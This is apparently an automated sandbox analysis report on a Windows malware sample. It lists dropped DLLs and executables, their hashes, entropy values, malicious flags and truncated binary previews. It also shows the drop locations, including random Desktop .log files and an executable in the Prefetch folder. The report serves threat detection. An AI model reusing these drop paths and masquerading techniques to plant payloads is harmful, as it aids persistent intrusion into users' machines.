SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hwDWkmWW.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ifKwJWCS.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\itfeGmlQ.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jHNEqIuO.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jLnWNQxJ.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nQMnEjGz.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oXnVlCHH.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\pUOdHCWB.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qBrDLwRs.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sNdMsyHA.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sTOcLgQt.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tKFUOyWv.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tcMmcUQx.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vIRlNZYv.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wPQtSLGm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wYntCyZj.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xGttiZnp.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\xiBLBWku.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\xnytOABw.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Windows\Prefetch\7963a3365bd9f9

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (587), with no line terminators
Category:	dropped
Size (bytes):	587
Entropy (8bit):	5.884124676677957
Encrypted:	false
SSDEEP:	12:w/WJdLjpKfGVsOx707vqH8MTeS+twsw403r7bESzUCXa:mWJdL/s+uCH84eS+tr27bvXa
MD5:	DD2454E0B536E02BD04FC1399E6BC9AF
SHA1:	49200D7D5BD2F0416870B4282CB37C623D1C5C53
SHA-256:	1554ED8C7EF88C1CFAEB96401477CB5CFFD81B5DA7289303853A1A842D09BC40
SHA-512:	5C95563CD96A1D26B96B974F389502DAE89C034919F8D27B2C2F2147682BA0BCA29F358DA96E9337825A7D6E0C2710442D6D7C946BEA63B2149EB0016AFE8B18
Malicious:	false
Preview:	QlYtKW6XEOfPEEXXnlaxWoiHDPSgWbSYdGA3fhUGwjhQDMSpiEtSwvNmCQp5EZBm6Gv7Ed1GQTAwGSE06m7Sr9ls3Y0P1YCWh4T7bVlFNnCduafuMz9cct46eDEpmlO1RoPM8GZlA2FE7I7c2GDCZj4y9XcYQ5clYKMGLTwFZYbjo09WFmwgiMbrtaMloBUEadpx61QjU8mBHUJJXGSoI6DMseXuGLaYDWJKLMZOVNLjkZjYRCNhsq6dadEbefcJhN8vL88LqES5udlS48dE72qXaqurH8u0uCCXbyNSEB1nXAs61vhfBYLogkUfNQDsUbLsbO0GvLA6BDAZ7y0WaOyW0X11erEx7IS5zAfn4bt0XOnck4iZarRFnz1DX9lDGN82uEk6TMb9e88luYRjJpWP1NSAIbQ5zqtKPusfTlFOQRko0PS9rC3b0tBhvky15fKyPxVApvPijH8jmoJ3IROwwRUgtLutxOSvGwYD3ST5wU2sub4Ha5soRYB7dzQeBfvVzNd0PF907SAbZlwSQnT2foesuakECz4Qjh3g8D1U52q8Xji2D8NXM3zLtuGyf4yIXt22rPU

C:\Windows\Prefetch\HpQPPZazcv.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
